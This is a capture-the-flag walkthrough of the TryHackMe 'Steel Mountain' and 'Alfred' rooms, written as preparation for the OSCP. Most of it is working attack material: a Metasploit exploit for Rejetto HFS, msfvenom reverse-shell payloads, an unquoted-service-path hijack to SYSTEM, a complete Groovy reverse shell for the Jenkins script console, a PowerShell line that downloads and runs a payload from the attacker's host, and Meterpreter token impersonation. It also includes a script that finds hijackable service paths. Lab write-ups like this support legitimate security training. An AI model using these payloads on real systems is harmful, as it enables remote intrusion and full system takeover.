Here I document the key steps to root machines on TryHackMe, focusing on the “OSCP Preparation” learning path, which contains 18 machines. I will add detailed explanations whenever I have time.

Interesting Machines

A - Introduction

1. Kali Machine

Deploy and control your own Kali Linux machine directly from your browser.

2. OpenVPN

The OpenVPN room will guide you to connect to the network in order to access deployed machines.

B - Getting Started

3. Vulnversity

4. Blue

5. Kenobi

C - Proving It

6. Steel Mountain

@ http://10.10.141.130:8080/ -> HttpFileServer 2.3
- Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (https://www.exploit-db.com/exploits/39161)
MSF> use exploit/windows/http/rejetto_hfs_exec
MSF> set RHOSTS 10.10.141.130
MSF> set RPORT 8080
MSF> set LHOST 10.11.2.147
MSF> set LPORT 443
MSF> exploit
meterpreter > cd "C:\Users\bill\Desktop"
meterpreter > upload /root/OSCP/PE/PowerUp.ps1
C:\Users\bill\Desktop> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
-> Checking for unquoted service paths...
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
- The unquoted path makes Windows try C:\Program Files (x86)\IObit\Advanced.exe before the real ASCService.exe, so a binary named Advanced.exe dropped in the IObit directory runs as LocalSystem when the service starts.
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.2.147 LPORT=443 -e x86/shikata_ga_nai -f exe -o Advanced.exe
meterpreter > cd "C:\Program Files (x86)\IObit"
meterpreter > upload /root/OSCP/Advanced.exe

$ nc -lvnp 443   (start the listener before restarting the service)
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
-> reverse shell as NT AUTHORITY\SYSTEM on the nc listener
==============================
- download winPEAS.exe (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/Release/winPEAS.exe)
meterpreter > upload /root/OSCP/PE/winPEAS.exe
C:\Program Files (x86)\IObit>winPEAS.exe
[?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Stopped - No quotes and Space detected
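
PowerUp and winPEAS both flag the unquoted path above by reading ACLs. As an added example (not from the original writeup and not code from either tool), the PowerShell below enumerates every service with an unquoted ImagePath containing spaces, lists the paths Windows would try before the real binary, and checks writability by actually creating and deleting a scratch file in each candidate directory, which is the test that matters for dropping Advanced.exe. Assumptions: the ".exe" heuristic for separating the binary from its arguments and the probe-file write are mine; it is meant to be run on the target from a low-privilege PowerShell session.

```powershell
# Added example (not from the original writeup): find services with an unquoted
# binary path containing spaces, compute the hijack candidates Windows would try
# first, and check which candidate directories the current user can create a
# file in. Run on the target from a low-privilege PowerShell session.
# (Get-CimInstance needs PowerShell 3+; on older hosts swap in Get-WmiObject.)

function Get-HijackCandidate {
    # For an unquoted ImagePath, CreateProcess splits on each space and tries
    # "<prefix>.exe" before moving on to the next token. Return every such path
    # that precedes the real binary.
    param([Parameter(Mandatory)][string]$ExePath)
    $tokens = $ExePath -split ' '
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        ($tokens[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    # Try to create (and immediately remove) a scratch file. This is stricter
    # than reading the ACL: "AppendData/AddSubdirectory" on C:\ lets Users make
    # a folder there but not drop the file C:\Program.exe.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $raw = $_.PathName
        # Quoted paths are not affected; skip them and services with no path.
        if (-not $raw -or $raw.TrimStart().StartsWith('"')) { return }
        # Heuristic (assumption): the binary is everything up to the first
        # ".exe"; whatever follows are service arguments.
        $m = [regex]::Match($raw, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { return }
        $exe = $m.Groups[1].Value.Trim()
        if ($exe -notmatch ' ') { return }   # no space, nothing to hijack

        foreach ($candidate in Get-HijackCandidate -ExePath $exe) {
            $dir = Split-Path -Path $candidate -Parent
            [pscustomobject]@{
                Service   = $_.Name
                StartName = $_.StartName
                StartMode = $_.StartMode
                State     = $_.State
                ImagePath = $exe
                Candidate = $candidate
                Writable  = Test-DirectoryWritable -Path $dir
            }
        }
    }
}

# Only rows with Writable = True are worth a payload; services running as
# LocalSystem are the interesting ones.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

Note the difference from PowerUp's ModifiablePath=C:\ with AppendData/AddSubdirectory: that right lets Users create a folder in C:\ but not the file C:\Program.exe, so the write probe reports C:\ as not writable, whereas C:\Program Files (x86)\IObit, where the writeup dropped Advanced.exe, passes. Whether you can restart the service (sc stop/start, or wait for a reboot with StartMode Auto) still has to be checked separately.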

7. Alfred

@ http://10.10.16.248
@ http://10.10.16.248:8080/login?from=%2F (admin/admin)
- Manage Jenkins -> Script Console -> @ http://10.10.16.248:8080/script
(https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
String host = "10.11.2.147";
int port = 8044;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

$ nc -lvnp 8044   (catches the Groovy reverse shell; start it before running the script)
- After getting user.txt, convert to a Meterpreter session for PE (https://www.offensive-security.com/metasploit-unleashed/fun-incognito/)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.2.147 LPORT=443 -f exe -o alfred.exe

MSF> use exploit/multi/handler
MSF> set PAYLOAD windows/meterpreter/reverse_tcp
MSF> set LHOST 10.11.2.147
MSF> set LPORT 443
MSF> exploit

- Serve alfred.exe over HTTP from the attacker box, then pull and run it from the Groovy shell:
C:\Program Files (x86)\Jenkins>powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.11.2.147/PE/alfred.exe','alfred.exe')"
C:\Program Files (x86)\Jenkins>alfred.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
meterpreter > impersonate_token "BUILTIN\Administrators" 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : ALFRED
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
- The payload is x86 but the OS is x64, so migrate into an x64 SYSTEM process before going further:
meterpreter > ps
1348  668   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
meterpreter > migrate 1348
[*] Migrating from 2156 to 1348...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
C:\Windows\system32>type "C:\Windows\System32\config\root.txt"